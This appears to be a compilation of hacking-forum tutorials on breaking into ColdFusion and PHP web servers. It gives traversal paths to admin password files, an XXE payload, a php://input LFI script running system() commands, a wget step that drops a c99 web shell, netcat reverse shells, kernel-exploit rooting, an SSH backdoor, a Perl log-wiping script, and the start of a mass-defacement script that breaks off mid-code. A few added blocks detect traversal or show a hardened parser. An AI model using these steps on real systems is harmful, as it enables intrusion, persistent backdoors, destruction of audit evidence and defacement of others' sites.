Today I will go over part I of a few tricks we can use to attack Cold Fusion servers of various versions using a few published methods. Cold Fusion is an Adobe product targeted at enterprise and small business owners. It is probably most commonly known for and associated with CFML, or Cold Fusion Markup Language, and most visually associated with .cfm files on web servers. CF platforms are built on a Java core and as such also have some built-in features which allow command execution and database interaction. The following should present you with a few methods you can use to check for common vulnerabilities on these platforms, as well as how to exploit them. Most of these were published ages ago in 2010 but there are still many sites which are either running versions which are un-patchable or just simply running unpatched software still....

I will start this series off with the most common vulnerability first, which is the known Local File Disclosure, or LFI, in the 'locale' parameter (also referenced under CVE-2010-2861). The LFI vulnerability allows us to read files off of the target system without any authentication. The neat thing that makes this one different from most LFDs is that if we play our cards right we can use this vulnerability as a foothold to further penetrate our target; read on and see. We first try to find the admin page, as it is the most commonly vulnerable page, but certainly not the only one. You can typically find it at one of the following locations:

/CFIDE/administrator/index.cfm
/CFIDE/administrator/enter.cfm
/CFIDE/componentutils/index.cfm
/CFIDE/componentutils/login.cfm

You can determine the version of the CF server by simply viewing the login page in most cases, as the image usually contains the version graphically, like so:

Knowing the version is important as it helps us to determine the appropriate path to use to try and turn this LFD into something useful. Now if you know the full path to the CF '.properties' file then you're in business, as it contains the CF admin password hashes. The list of possible paths worth trying is as follows:

v6: locale=..\..\..\..\..\..\..\..\CFusionMX\lib\password.propertiesen
v7a: locale=..\..\..\..\..\..\..\..\CFusionMX7\lib\password.propertiesen
v7b: locale=..\..\..\..\..\..\..\..\opt\coldfusionmx7\lib\password.propertiesen
v8: locale=..\..\..\..\..\..\..\..\ColdFusion8\lib\password.propertiesen
vJRun: locale=..\..\..\..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.propertiesen

If you have a successful injection for one of the above files, you will see the password hash(es) show up on the page you're injecting into. It will look a bit like this:

NOTE: In versions 6 & 7 encryption is not enabled by default, although I have never seen a server which did not encrypt the password in hash form.

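Every path in the list above has the same shape: a run of `..\` segments, a fixed install directory and a configuration file name, sometimes arriving percent-encoded or double-encoded. The block below is an added example from the defender's side, not part of this write-up or of ColdFusion: it fully decodes a request parameter, normalises slashes, reports the traversal indicators it finds, and implements the allowlist that the 'locale' parameter should have had (a locale is a short language code, nothing else). The indicator names, the locale pattern and the decode depth are this example's own assumptions.

```python
import re
from urllib.parse import unquote

# A locale is a language code with an optional region: en, en_US, pt-BR.
LOCALE_RE = re.compile(r"^[a-z]{2,3}(?:[_-][A-Za-z]{2,4})?$")


def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding (e.g. %252e -> %2e -> .) so the checks
    run on what the application would eventually see, not on the wire form."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def traversal_indicators(value):
    """Return the reasons a parameter value looks like a file-path probe
    (empty list when nothing suspicious is present)."""
    v = fully_decode(value)
    norm = v.replace("\\", "/")            # treat Windows and POSIX separators alike
    reasons = []
    if re.search(r"(^|/)\.\.(/|$)", norm):
        reasons.append("dot-dot segment")
    if norm.startswith("/") or re.match(r"^[A-Za-z]:/", norm):
        reasons.append("absolute path")
    if "\x00" in v:
        reasons.append("null byte")         # classic extension-truncation trick
    if re.search(r"\.(properties|ini|conf|xml|passwd)", norm, re.IGNORECASE):
        reasons.append("configuration file name")
    return reasons


def safe_locale(value):
    """Allowlist check for a 'locale'-style parameter: returns the cleaned
    locale or raises ValueError. The allowlist alone would already reject
    every probe; the indicator check is kept so the rejection can be logged
    with a reason instead of as a silent validation failure."""
    v = fully_decode(value).strip()
    reasons = traversal_indicators(v)
    if reasons or not LOCALE_RE.match(v):
        raise ValueError("rejected locale %r: %s" % (value, ", ".join(reasons) or "not a locale"))
    return v


if __name__ == "__main__":
    for sample in ["en_US", r"..\..\..\..\CFusionMX\lib\password.propertiesen",
                   "%252e%252e/etc/passwd"]:
        print("%-50s -> %s" % (sample, traversal_indicators(sample) or "clean"))
```

The order matters in a real handler: decode first, then check, then use only the allowlisted value; checking before decoding is how `%2e%2e%5c` walks past a naive filter.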
Now you can crack the password hash and log in with the clear-text password, or we can use a little trick to bypass the authentication requirement with a pass-the-hash technique. The login form uses a bit of JavaScript magic to create an HMAC hash from the admin password hash and a salt value which is changed every 30 seconds. You can find this salt value by simply viewing the source code of the login page; look at the second occurrence of the term 'salt' or review the form input details. Because of this, we pass the hash, generate the HMAC hash on our own and submit, simulating a successful login! You need to grab the salt from the source:

OK, so you now have the password hash and salt in hand....

Here is some code I whipped up to accomplish this task of logging in real quick for you to get the authenticated cookie.


Quickly enter the needed details and run it. If successful, you will have the authenticated cookie presented to you in the terminal, like so:

Now once you have the authenticated cookie, you're pretty much in. You can use your favorite cookie editor to load up the new 'CFAUTHORIZATION_cfadmin=<SOMEVALUEHEREONSUCCESS>'. Once loaded you simply refresh your browser and you're now logged into the administrative panel for Cold Fusion. Now to try and get a shell up on the server....

If you already know the server path to the web-facing directory then you can move forward; if not you can check the 'Mappings' link on the left under 'Server Settings'. This will show a mapping of all paths for CF; by default the /CFIDE dir should be mapped, giving us a usable path in the majority of cases. The Mappings page looks like this:

Once the path is known we will move to the 'Scheduled Tasks' page located under 'Debugging & Logging' in the left menu links.

Now you simply point the task scheduler at your remote CFM/JSP shell hosted on a server you control, stored in txt format like an RFI attack payload. You can schedule it as a one-time event; it will default to the current time so there is no need to calculate things if you're in a different time zone :) If you need a username/password to access the remote shell file source then provide them as needed in the appropriate fields of the task scheduler. The next part is key: mark the 'Publish' option as true so it saves the results to a file (i.e. grabs our remote shell source and saves it as an executable). You then provide it with the full path to where you want to write to. In the majority of cases /CFIDE is writable; otherwise poke around or generate errors in SQL queries on the site to get the path (standard Full Path Disclosure rules still apply here). When your form is all set up you can submit to create the scheduled task.

You will need to click on the green check-mark icon to run the scheduled task, which actually executes it and grabs our shell. If it has problems with the remote file you will likely get a warning message of some kind in the admin panel; edit and retry. Upon success, you can point your browser at the path you uploaded your shell to. In most cases Cold Fusion is running on a Windows system with full NT AUTHORITY\SYSTEM privileges, which means you pretty much own the local box now :)

If you find that 'cfexecute' is disabled and blocking your CFM shell from working properly, you can simply re-enable it from the admin panel since you already have access :)

NOTE: JSP is only supported on Enterprise versions of ColdFusion. You can actually determine Enterprise vs Standard by requesting a non-existent .jsp file and judging how the server responds!

You have now successfully shelled a Cold Fusion server at this point and in most cases have admin privileges to do what you want (create a new user, add it to the admin group, add/enable RDP, enjoy the new RDP). In the rare *nix instances you're likely running as nobody or another non-elevated user, so the usual post-exploitation game plan still applies if you want to take over the whole server (i.e. root the box). Hope you enjoyed this first part of this series; the second part will follow shortly....

Hacking Cold Fusion Servers - Part II


Now I will go over two more vulnerabilities which can potentially be leveraged to attack Cold Fusion servers. This time we will be looking at exploiting a weak uploader as well as another LFD/LFI vulnerability, but with a small twist. If you didn't catch the first part then I encourage you to read that thread before reading this one, as it makes for a better attack flow in general this way. Assuming you're all set, let's begin....

Now one thing to be aware of is that Cold Fusion packed an FCKeditor in with v8 when it was first released and they didn't do proper checking on the upload types. If you give it a file as .txt but write to .cfm or .jsp it thinks this is OK! This exploit will take some coding abilities on your behalf, or the ability to use Metasploit, as it has a nice pre-built exploit for this one (Java Meterpreter works best for the payload). You basically point and shoot with MSF and hope for the best. If the uploader is present it will try to send a multipart upload request via POST. If successful you should be able to find a shell in the '/userfiles/file/' directory of the site. Now I have coded my own script for this and tried with Metasploit but have not successfully exploited this myself, so I'm not going to post my code just yet; I would like to confirm it first. You have MSF as a crutch for now; you can find the module by referencing CVE-2009-2265, or just type 'use exploit/windows/http/coldfusion_fckeditor'. I will update this section when I have confirmation of working code on my part.....




OK, so in addition to the previously shown LFD/LFI to RCE vulnerability we demonstrated in part I of this series, there is another LFD/LFI vulnerability. This time it is XML External Entities (XEE) Injection in the Data Services, which allows a wide range of XML-based attacks, including Local File Disclosure, TCP scans and Denial of Service conditions, which can be achieved by recursive entity injection, attribute blow-up and other types of injection. For more information about the implications associated with this vulnerability, refer to RFC 2518 (17.7 Implications of XML External Entities): http://www.ietf.org/rfc/rfc2518.txt. I will show you how we can exploit this to map out the target server and read files. Basically we send a carefully crafted XML request to the Data Service file handler and if it is vulnerable to XEE Injection it will spit back the results we ask for. Here are some common files to check:

/flex2gateway/
/flex2gateway/http
/flex2gateway/httpsecure
/flex2gateway/cfamfpolling
/flex2gateway/amf
/flex2gateway/amfpolling
/messagebroker/http
/messagebroker/httpsecure
/blazeds/messagebroker/http
/blazeds/messagebroker/httpsecure
/samples/messagebroker/http
/samples/messagebroker/httpsecure
/lcds/messagebroker/http
/lcds/messagebroker/httpsecure
/lcds-samples/messagebroker/http
/lcds-samples/messagebroker/httpsecure

You can accomplish this with the Hackbar add-on in Firefox easily enough; Burp or Netcat is just as easy. Essentially we can use the XML code below as a framework for our file injection and enumeration; simply pass it as POST data to the vulnerable Data Service:

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE test [ <!ENTITY x3 SYSTEM "<INSERT_PATH/FILE_HERE>"> ]><amfx ver="3" xmlns="http://www.macromedia.com/2005/amfx"><body><object type="flex.messaging.messages.CommandMessage"><traits><string>body</string><string>clientId</string><string>correlationId</string><string>destination</string><string>headers</string><string>messageId</string><string>operation</string><string>timestamp</string><string>timeToLive</string></traits><object><traits /></object><null /><string /><string /><object><traits><string>DSId</string><string>DSMessagingVersion</string></traits><string>nil</string><int>1</int></object><string>&x3;</string><int>5</int><int>0</int><int>0</int></object></body></amfx>

Simply replace '<INSERT_PATH/FILE_HERE>' with the path to read and let the requests rip, like so:

Now the cool thing here is that it works regardless of OS, since it comes from how
the Data Services handle and parse the XML being passed; just make sure you request
the proper kind of path for the system type (check the server response headers if
you have no idea). One caveat: the entity is parsed as XML, so a file containing
bare '<' or '&' characters, or bytes that are not valid UTF-8, breaks the parse and
comes back as an error rather than as content. Plain text files such as /etc/passwd
work fine.

Also, in addition to reading files, you can simply pass a directory and it will spit
back the directory listing, making it very easy to map things out and find files
worth reading. Limited privileges may restrict some file reading, but there is still
plenty to cause trouble, enumerate lots of info, and possibly even read the site
configuration details...
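To make the mechanism concrete, here is an added example, not code from the original write-up and not ColdFusion's own code. It builds the AMFX message above with entity x3 pointing at a file and feeds it to Python's xml.sax parser twice: once with external general entities enabled, which is how the vulnerable Data Service behaved, and once with them disabled, which is what a fixed parser does. The real service parses with Java, so xml.sax is only a stand-in; the endpoint list is the one from the text, the passwd-style file is constructed, and the helper names are mine.

```python
"""XXE through an AMFX CommandMessage, demonstrated offline with Python's xml.sax."""
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges

# Handler paths from the write-up, to be tried one by one against the host.
CANDIDATE_ENDPOINTS = [
    "/flex2gateway/", "/flex2gateway/http", "/flex2gateway/httpsecure",
    "/flex2gateway/cfamfpolling", "/flex2gateway/amf", "/flex2gateway/amfpolling",
    "/messagebroker/http", "/messagebroker/httpsecure",
    "/blazeds/messagebroker/http", "/blazeds/messagebroker/httpsecure",
    "/samples/messagebroker/http", "/samples/messagebroker/httpsecure",
    "/lcds/messagebroker/http", "/lcds/messagebroker/httpsecure",
    "/lcds-samples/messagebroker/http", "/lcds-samples/messagebroker/httpsecure",
]


def build_payload(path):
    """The AMFX CommandMessage from the write-up, with entity x3 pointing at `path`.

    The reference &x3; sits in the last <string> of the message, so a parser that
    resolves external entities hands the file contents back in that slot.
    """
    return (
        '<?xml version="1.0" encoding="utf-8"?>'
        '<!DOCTYPE test [ <!ENTITY x3 SYSTEM "%s"> ]>'
        '<amfx ver="3" xmlns="http://www.macromedia.com/2005/amfx"><body>'
        '<object type="flex.messaging.messages.CommandMessage">'
        '<traits><string>body</string><string>clientId</string><string>correlationId</string>'
        '<string>destination</string><string>headers</string><string>messageId</string>'
        '<string>operation</string><string>timestamp</string><string>timeToLive</string></traits>'
        '<object><traits /></object><null /><string /><string />'
        '<object><traits><string>DSId</string><string>DSMessagingVersion</string></traits>'
        '<string>nil</string><int>1</int></object>'
        '<string>&x3;</string><int>5</int><int>0</int><int>0</int>'
        '</object></body></amfx>' % path
    )


class StringCollector(ContentHandler):
    """Collects the text of every <string> element in document order."""

    def __init__(self):
        super().__init__()
        self.strings = []
        self._buf = None

    def startElement(self, name, attrs):
        if name == "string":
            self._buf = []

    def characters(self, data):
        if self._buf is not None:
            self._buf.append(data)

    def endElement(self, name):
        if name == "string" and self._buf is not None:
            self.strings.append("".join(self._buf))
            self._buf = None


def parse_message(payload, resolve_external_entities):
    """Parse the AMFX text. True mimics the vulnerable service, False a hardened one."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external_entities)
    handler = StringCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(payload.encode("utf-8")))
    return handler.strings


def demo():
    """Create a stand-in for /etc/passwd (constructed data) and attack it both ways."""
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as fh:
        fh.write("root:x:0:0:root:/root:/bin/bash\n")
        victim = fh.name
    try:
        payload = build_payload(victim)
        leaked = parse_message(payload, resolve_external_entities=True)
        blocked = parse_message(payload, resolve_external_entities=False)
    finally:
        os.unlink(victim)
    # The file contents land in the last <string>; the hardened parser leaves it empty.
    return leaked[-1], blocked[-1]


if __name__ == "__main__":
    vuln, fixed = demo()
    print("vulnerable parser returned: %r" % vuln)
    print("hardened parser returned:   %r" % fixed)
```

Against a real target the payload goes in a POST body to each of CANDIDATE_ENDPOINTS and the interesting part of the reply is whatever comes back in that last string. Two things the demo makes visible: the file is parsed as XML, so anything that is not well-formed character data fails rather than leaks, and the directory-listing behaviour the text mentions is a property of Java's file: URL handler, which Python's resolver does not reproduce.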

In addition to the named exploits in this ColdFusion series, the usual suspects are
still fair game here. SQL injection vulnerabilities are just as common as on PHP- or
ASP-based sites, and 'cfinclude' tags can enable source disclosure. In many cases
the database can be compromised and Java calls may be leveraged to extend the attack
vectors and the escalation platform beyond a standard injection, so keep your eyes
open and don't be afraid to take on a site just because it has .CFM or .JSP files
instead of the oh-so-popular .PHP or .ASP. Hope you enjoyed this short series on
hacking ColdFusion servers. All material for the series was available on the net in
various places; all I did was wrap it up for you and try to make it a little easier
to understand. If you have any questions or suggestions, please post them here or
let me know via PM.

LFI exploitation via php://input [Shelling Sites]

Hey guys,
Today I'll be explaining how to shell a website through an LFI using the "php://input" method.

So let's get started.
First, the target. As an example, your target URL should look like this:
Code:
http://www.site.com/index.php?page=
Anything similar will do, as long as the parameter ends up in include() so that you can read
files, or at least provoke an "include" error.

First things first, give it a shot and see if you can read "/etc/passwd"

URL will look like:
Code:
http://www.site.com/index.php?page=/etc/passwd
If successful, the page will show the contents of /etc/passwd (one "name:x:uid:gid:..." line per
account).


Now let's try reading:

Code:
/proc/self/environ
/proc/self/fd
So URL will become:
Code:
http://www.site.com/index.php?page=/proc/self/environ
http://www.site.com/index.php?page=/proc/self/fd
Hmm, seems like nothing is being displayed, even though I've added a null byte at the end of the URL.


Well, not to worry, it's time to use our backup method. With "php://input" the PHP code we put in
the POST body is what the vulnerable include() ends up executing, which gives us command execution
and hence a way to upload a shell. It requires allow_url_include to be On, because include() treats
php://input as a URL-style wrapper.
This can be done using the "Hackbar" or the "Live HTTP headers" add-on.

I'll show you how to exploit via php://input using the Hackbar.

In the Hackbar, tick "Enable Post data": the target URL goes in the URL box and the PHP code in the
Post data box, then press Execute.

Now let's put this method into action.


URL will be:
Code:
http://www.site.com/index.php?page=php://input
and POST DATA:
Code:
<?php system('uname -a'); ?>
(Use the full <?php tag; the short <? form only works when short_open_tag is enabled.)
Other commands
List directories
Code:
<?php system('ls'); ?>
Identification
Code:
<?php system('id'); ?>
Rename a file (for example to give an uploaded text file a .php extension)
Code:
<?php system('mv file.txt file.php'); ?>
Alright, let's spawn a shell there now, shall we.

Grab a shell from sh3ll.org or anywhere else.
For now, we'll be using the normal c99 shell:
Code:
http://www.sh3ll.org/c99.txt

Let's use the "wget" command to drop our shell onto the site (the output name must end in .php so
the web server executes it, and the current directory must be writable by the web server user).

So our POST DATA will be:
Code:
<?php system('wget http://www.sh3ll.org/c99.txt -O nameofshell.php'); ?>

Now that you've dropped a shell, you can navigate to it on the site:
Code:
http://www.site.com/nameofshell.php
You can watch a video tutorial below so that it'll be easier to understand.
Have fun.
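The same steps as a script, as an added example rather than anything from the original post: probe the parameter with /etc/passwd (with and without the null-byte trick, which only matters on PHP older than 5.3.4), then turn php://input into a command runner. The marker string, helper names and the sample responses in the test are mine; the URL, parameter and command come from the post.

```python
"""LFI probe plus php://input command execution."""
import re
import sys
import urllib.error
import urllib.request

# Lines of /etc/passwd look like "name:x:uid:gid:gecos:home:shell"; two such lines
# in a response are strong evidence the include() read the file.
PASSWD_LINE = re.compile(
    r"^[a-z_][a-z0-9_-]*:[^:\n]*:\d+:\d+:[^:\n]*:[^:\n]*:[^:\n]*$", re.M
)
MARKER = "__OUT__"   # constructed delimiter so the command output can be cut out of the HTML


def build_lfi_url(base_url, param, path, null_byte=False):
    """base_url?param=path; null_byte appends %00 to chop off a suffix such as '.php'."""
    sep = "&" if "?" in base_url else "?"
    return "%s%s%s=%s%s" % (base_url, sep, param, path, "%00" if null_byte else "")


def looks_like_passwd(body):
    return len(PASSWD_LINE.findall(body)) >= 2


def php_quote(s):
    """Single-quoted PHP string literal."""
    return "'" + s.replace("\\", "\\\\").replace("'", "\\'") + "'"


def php_payload(cmd, marker=MARKER):
    """PHP that include('php://input') will run; markers bracket the command output."""
    return "<?php echo '%s'; system(%s); echo '%s'; ?>" % (marker, php_quote(cmd), marker)


def extract_output(body, marker=MARKER):
    start = body.find(marker)
    if start < 0:
        return None
    start += len(marker)
    end = body.find(marker, start)
    return body[start:end] if end >= 0 else None


def fetch(url, data=None, timeout=15):
    """GET, or POST raw bytes. text/plain keeps PHP from consuming the body as form data."""
    req = urllib.request.Request(url, data=data, headers={"User-Agent": "Mozilla/5.0"})
    if data is not None:
        req.add_header("Content-Type", "text/plain")
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:       # PHP warnings often come with a 500
        return err.read().decode("utf-8", "replace")


def probe(base_url, param):
    """Return the URL that disclosed /etc/passwd, or None if neither variant worked."""
    for null_byte in (False, True):
        url = build_lfi_url(base_url, param, "/etc/passwd", null_byte)
        if looks_like_passwd(fetch(url)):
            return url
    return None


def run_command(base_url, param, cmd):
    """Execute `cmd` through include('php://input') and return its output."""
    url = build_lfi_url(base_url, param, "php://input")
    return extract_output(fetch(url, data=php_payload(cmd).encode()))


if __name__ == "__main__":
    if len(sys.argv) < 4:
        sys.exit("usage: lfi_input.py http://www.site.com/index.php page 'uname -a'")
    base, param, cmd = sys.argv[1:4]
    print("file read confirmed via:", probe(base, param) or "not confirmed")
    print(run_command(base, param, cmd))
```

If probe() confirms the read but run_command() returns None, the usual reason is allow_url_include=Off, in which case php://input is refused and the /proc/self/environ or log-poisoning routes are the fallback.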

Server Rooting via Shell and Mass Defacement Script
Now let's go for root:

Getting a back-connection from the server
Copy the Netcat directory to C:\
Open a command prompt and type: cd C:\netcat
It'll look like this:

Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Users\kislay>cd c:\netcat
c:\netcat>

Now type: nc -l -v -p 2121
It'll look like:

c:\netcat>nc -l -v -p 2121
listening on [any] 2121 ...

Open your shell in your browser and go to the back-connect tab; if it is not there, get a
shell like "b374k" or any other, that's your choice.

Specify your IP and port 2121 and press connect. Your listener now has a shell on the server,
and you can run commands on the server through it. (The server connects out to you, so your IP
must be reachable from it: a public address or a port forward on your router.)

Getting the right exploit for the server

Type: uname -a and hit enter (commands are case-sensitive on Linux).

It'll look something like this:

[[email protected] /home/saijyoti/public_html/cgi-bin]$ uname -a
Linux dualxeon09.ns5.999servers.com 2.6.18-194.26.1.el5 #1 SMP Tue Nov 9 12:54:20 EST 2010
x86_64 x86_64 x86_64 GNU/Linux

It shows the kernel release of the server is 2.6.18-194.26.1.el5 (a RHEL/CentOS 5 kernel, built
in 2010) on x86_64.
You need to find a matching exploit for it. You can find them at:

# Exploit-db.com
# Packetstormsecurity.org
# Th3-0utl4ws.com
# Leetupload.com

# r00tw0rm.com
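Picking the exploit starts with reading that uname line correctly, so here is an added example (mine, not from the post) that splits a Linux `uname -a` line into the fields that matter for the search: kernel version, distro tag, architecture and build year. The sample line is the one from the post; the field layout assumptions and the search phrasing are mine.

```python
"""Triage of a Linux `uname -a` line for kernel-exploit selection."""
import re

# uname -a prints: sysname hostname release version machine [processor] [platform] os.
# The version field ("#1 SMP ...") contains spaces, so the architecture token is
# located first and everything between release and it is taken as the version.
ARCH_RE = re.compile(
    r"^(x86_64|amd64|i[3-6]86|aarch64|arm\w*|ppc64\w*|s390x|mips\w*|sparc\w*|riscv\d+)$"
)
RELEASE_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)")
TAG_RE = re.compile(r"[.-]([a-z]+\d*)$")   # distro tag such as el5, fc14, generic, amd64


def kernel_tuple(release):
    """'2.6.18-194.26.1.el5' -> (2, 6, 18), the part exploit advisories are keyed on."""
    m = RELEASE_RE.match(release)
    if not m:
        raise ValueError("unrecognised kernel release: %r" % release)
    return tuple(int(x) for x in m.groups())


def kernel_older_than(release, bound):
    """Compare upstream versions only; a vendor kernel may carry backported fixes."""
    return kernel_tuple(release) < kernel_tuple(bound)


def triage(uname_line):
    tokens = uname_line.split()
    if len(tokens) < 5 or tokens[0] != "Linux":
        raise ValueError("not a Linux uname -a line")
    try:
        arch_idx = next(i for i in range(3, len(tokens)) if ARCH_RE.match(tokens[i]))
    except StopIteration:
        raise ValueError("no architecture token found")
    release = tokens[2]
    version = " ".join(tokens[3:arch_idx])
    tag = TAG_RE.search(release)
    year = re.search(r"\b(\d{4})\b", version)      # RHEL-style builds end in a date
    kernel = "%d.%d.%d" % kernel_tuple(release)
    return {
        "hostname": tokens[1],
        "release": release,
        "kernel": kernel,
        "version": version,
        "distro_tag": tag.group(1) if tag else None,
        "arch": tokens[arch_idx],
        "build_year": int(year.group(1)) if year else None,
        # search phrase for exploit-db / searchsploit; the wording is an assumption
        "search": "linux kernel %s" % kernel,
    }


if __name__ == "__main__":
    line = ("Linux dualxeon09.ns5.999servers.com 2.6.18-194.26.1.el5 #1 SMP "
            "Tue Nov 9 12:54:20 EST 2010 x86_64 x86_64 x86_64 GNU/Linux")   # line from the post
    for key, value in sorted(triage(line).items()):
        print("%-11s %s" % (key, value))
```

The distro tag is the part worth paying attention to: an el5 kernel reports 2.6.18 forever while Red Hat backports fixes into the -194.26.1 build number, so a public exploit for "2.6.18" may already be patched there, and the build number, not the upstream version, is what to compare against the vendor advisory.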

Compiling & executing the exploit

Now I've got an exploit, and it is written in C, so I can't execute it just by uploading it;
I need to compile it.

Before proceeding further, cd into a writable directory. /tmp is normally writable, but it may
be mounted noexec, in which case compile there and run the binary from a writable directory under
the web root instead. So type:
cd /home/XXXXX/public_html/tmp

// The path can be different, replace it with yours.
So first I'll get the exploit onto the server, so I type: wget http://exploitsite.net/exploits/my_exploit.c

// Note: There is no such site, I'm just using it to show you.
It'll look something like this:

[[email protected] /home/saijyoti/public_html/tmp]$ wget
http://exploitsite.net/exploits/my_exploit.c
--2011-01-25 08:21:43-- http://exploitsite.net/exploits/my_exploit.c
Resolving www.exploitsite.net... 120.139.90.84
Connecting to www.exploitsite.net|120.139.90.84|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15088 (15K) [text/x-csrc]
Saving to: `my_exploit.c'
0K .......... .... 100% 189K=0.08s
2011-01-25 08:21:44 (189 KB/s) - `my_exploit.c' saved [15088/15088]

Now change the permissions of the exploit to 777 (optional: the source file does not need to be
executable, and gcc sets the execute bit on the binary it produces).

Type: chmod 777 my_exploit.c
It may look like:

[admin@www.targetsite.com /home/targetsite/public_html/tmp]$ chmod 777 my_exploit.c

Now the exploit is on the server; I just need to compile and execute it.
So I'll give the command: gcc -o exploit my_exploit.c
It'll compile and save the exploit as a binary named exploit.
It may look like:

[[email protected] /home/targetsite/public_html/tmp]$ gcc -o exploit my_exploit.c

Next step is to execute it, so we'll type: ./exploit
It may look like:

[[email protected] /home/targetsite/public_html/tmp]$ ./exploit

Now it says got root. Let's check whether that's true.
Type: id
It may look like: uid=0(root) gid=0(root) groups=0(root)
Which means I got root :)

Installing a backdoor

Type: wget urlofbackdoor.com/sshdoor.zip
Then type: unzip sshdoor.zip
Then type: ./run pass port
^ replace pass with your password, and port with a port of your choice.
Now connect with PuTTY and enjoy root privileges. ;)

Methods to execute exploits written in other languages
# C
gcc -o exploit exploit.c
chmod +x exploit
./exploit
# Perl
perl exploit.pl
# Python
python exploit.py
# PHP
php exploit.php
# zip
unzip exploit.zip
./run

Cleaning logs
# You can use my log cleaner to clear your tracks :D. It is written in Perl. Save it as
anything.pl
and to execute type: perl anything.pl
Here is the code:
[perl]

#!/usr/bin/perl -w #Warnings enabled!
#Log cleaner version Public
#Give Credits Where Needed - Kouros!
#This took time, Hope you fucking use it :D
#Report bugs to [email protected]
#NOTE - YOU MUST BE ROOT!

#The log lists are declared before the loop so they are already filled on the first run
#Logs of Irix Systems
my @irix = ("/var/adm/SYSLOG", "/var/adm/sulog", "/var/adm/utmp", "/var/adm/utmpx",
"/var/adm/wtmp", "/var/adm/wtmpx", "/var/adm/lastlog/",
"/usr/spool/lp/log", "/var/adm/lp/lp-errs", "/usr/lib/cron/log",
"/var/adm/loginlog", "/var/adm/pacct", "/var/adm/dtmp",
"/var/adm/acct/sum/loginlog", "/var/adm/X0msgs", "/var/adm/crash/vmcore",
"/var/adm/crash/unix");
#Logs of Aix Systems
my @aix = ("/var/adm/pacct", "/var/adm/wtmp", "/var/adm/dtmp", "/var/adm/qacct",
"/var/adm/sulog", "/var/adm/ras/errlog", "/var/adm/ras/bootlog",
"/var/adm/cron/log", "/etc/utmp", "/etc/security/lastlog",
"/etc/security/failedlogin", "/usr/spool/mqueue/syslog");
#Logs of SunOS Systems
my @sunos = ("/var/adm/messages", "/var/adm/aculogs", "/var/adm/aculog",
"/var/adm/sulog", "/var/adm/vold.log", "/var/adm/wtmp",
"/var/adm/wtmpx", "/var/adm/utmp", "/var/adm/utmpx",
"/var/adm/log/asppp.log", "/var/log/syslog",
"/var/log/POPlog", "/var/log/authlog", "/var/adm/pacct",
"/var/lp/logs/lpsched", "/var/lp/logs/requests",
"/var/cron/logs", "/var/saf/_log", "/var/saf/port/log");
#Logs of Linux Systems
my @linux = ("/var/log/lastlog", "/var/log/telnetd", "/var/run/utmp",
"/var/log/secure", "/root/.ksh_history", "/root/.bash_history",
"/root/.bash_logout", "/var/log/wtmp", "/etc/wtmp",
"/etc/utmp", "/var/log", "/var/adm",
"/var/apache/log", "/var/apache/logs", "/usr/local/apache/logs",
"/var/log/acct", "/var/log/xferlog",
"/var/log/messages/", "/var/log/proftpd/xferlog.legacy",
"/var/log/proftpd.xferlog", "/var/log/proftpd.access_log",
"/var/log/httpd/error_log", "/var/log/httpsd/ssl_log",
"/var/log/httpsd/ssl.access_log", "/etc/mail/access",
"/var/log/qmail", "/var/log/smtpd", "/var/log/samba",
"/var/log/samba.log.%m", "/var/lock/samba", "/root/.Xauthority",
"/var/log/poplog", "/var/log/news.all", "/var/log/spooler",
"/var/log/news", "/var/log/news/news", "/var/log/news/news.all",
"/var/log/news/news.crit", "/var/log/news/news.err",
"/var/log/news/news.notice",
"/var/log/news/suck.err", "/var/log/news/suck.notice",
"/var/spool/tmp", "/var/spool/errors", "/var/spool/logs", "/var/spool/locks",
"/usr/local/www/logs/thttpd_log", "/var/log/thttpd_log",
"/var/log/ncftpd/misclog.txt", "/var/log/nctfpd.errs",
"/var/log/auth");

print qq^
####################################
# Log Cleaner 3.0 PUBLIC #
# Kouros #
# #
# Virangar Security Team #
# http://www.Kouros-bl4ckhat.com #
####################################
^;
while(1) {
print "Enter Which OS: "; #User Input
my $os = <STDIN>; #Takes it into memory
last unless defined $os; #Stop on EOF instead of looping forever
chomp($os);
if($os eq "help"){
print "[+]Enter Your OS! Choose from 'linux', 'aix', 'sunos', 'irix'\n";
print "[+]Hit enter with OS, Let the script do its work\n";
print "[+]Note: You MUST Be Root!\n";
print "[+]Contact Info[at]Kouros-bl4ckhat [dot] Com\n";
print "[+]For Bug finds... Have Fun!\n";
print "[+] - Kouros\n";
} elsif($os eq "linux"){ #If linux typed, unlink every path in @linux
foreach my $logphile (@linux) {
unlink($logphile) || print "[-]Fucked up: \"$logphile\" : $!\n";
}
} elsif($os eq "sunos"){ #If sunos typed, unlink every path in @sunos
foreach my $logphile (@sunos) {
unlink($logphile) || print "[-] Fucked up: \"$logphile\" : $!\n";
}
} elsif($os eq "aix"){ #If aix typed, unlink every path in @aix
foreach my $logphile (@aix) {
unlink($logphile) || print "[-] Fucked up: \"$logphile\" : $!\n";
}
} elsif($os eq "irix"){ #If irix typed, unlink every path in @irix
foreach my $logphile (@irix) {
unlink($logphile) || print "[-] Fucked up: \"$logphile\" : $!\n";
}
} else { print "Umm WTF !?\n"; }
} #Ends Loop
[/perl]
Mass deface
I have a Perl script to mass deface sites on the server. Execute it the same way as above.
[perl]
#!/usr/bin/perl
# MSRml V 0.1
#
# MOROCCO.SECURITY.RULZ mass defacer and log eraser
#
# coded by PRI[ll
#
# !!!!PRIV8!!!!!PRIV8!!!!!PRIV8!!!!!PRIV8!!!!
#
# 05/07/2005
#
# usage : perl MSRml.pl <path to index>
#
# example : perl MSRml.pl /tmp/index.html
#
# [email protected]
use strict;

my $index = $ARGV[0];

# Default log locations, checked one by one in the original order
my @default_logs = (
    "/var/log/lastlog", "/var/log/wtmp", "/etc/wtmp", "/var/run/utmp", "/etc/utmp",
